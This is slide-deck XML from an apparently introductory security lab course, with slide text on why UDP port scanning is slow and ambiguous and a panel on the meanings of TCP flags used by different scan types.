              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A silent port and a filtered port look identical</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This is why UDP scanning is slow and often wrong</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>DNS, SNMP, TFTP, DHCP and most VPNs live here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Scanning it properly takes patience, which is exactly why so few people bother</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5248656"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>THE FLAGS IN A TCP PACKET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="5248656"/>
            <a:ext cx="6702552" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Every scan type is a different way of starting, or refusing to finish, this handshake.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5541264"/>
            <a:ext cx="2084832" cy="768096"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7143"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="5614416"/>
            <a:ext cx="1828800" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="5833872"/>
            <a:ext cx="1828800" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>synchronise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="6016752"/>
            <a:ext cx="1847088" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>I want to open a connection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2779776" y="5541264"/>
            <a:ext cx="2084832" cy="768096"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7143"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926080" y="5614416"/>
            <a:ext cx="1828800" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926080" y="5833872"/>
            <a:ext cx="1828800" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>acknowledge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926080" y="6016752"/>
            <a:ext cx="1847088" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>I received your packet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5010912" y="5541264"/>
            <a:ext cx="2084832" cy="768096"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7143"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5157216" y="5614416"/>
            <a:ext cx="1828800" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>RST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5157216" y="5833872"/>
            <a:ext cx="1828800" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>reset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5157216" y="6016752"/>
            <a:ext cx="1847088" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Refused, go away</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242048" y="5541264"/>
            <a:ext cx="2084832" cy="768096"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7143"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7388352" y="5614416"/>
            <a:ext cx="1828800" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>FIN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7388352" y="5833872"/>
            <a:ext cx="1828800" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>finish</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7388352" y="6016752"/>
            <a:ext cx="1847088" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>I am closing, politely</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9473184" y="5541264"/>
            <a:ext cx="2084832" cy="768096"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7143"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9619488" y="5614416"/>
            <a:ext cx="1828800" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>PSH URG</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9619488" y="5833872"/>
            <a:ext cx="1828800" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>push, urgent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9619488" y="6016752"/>
            <a:ext cx="1847088" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Used only by odd scans</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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01 / FOUNDATIONS</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The lab you are attacking</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10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="11091672" cy="2651760"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2414"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
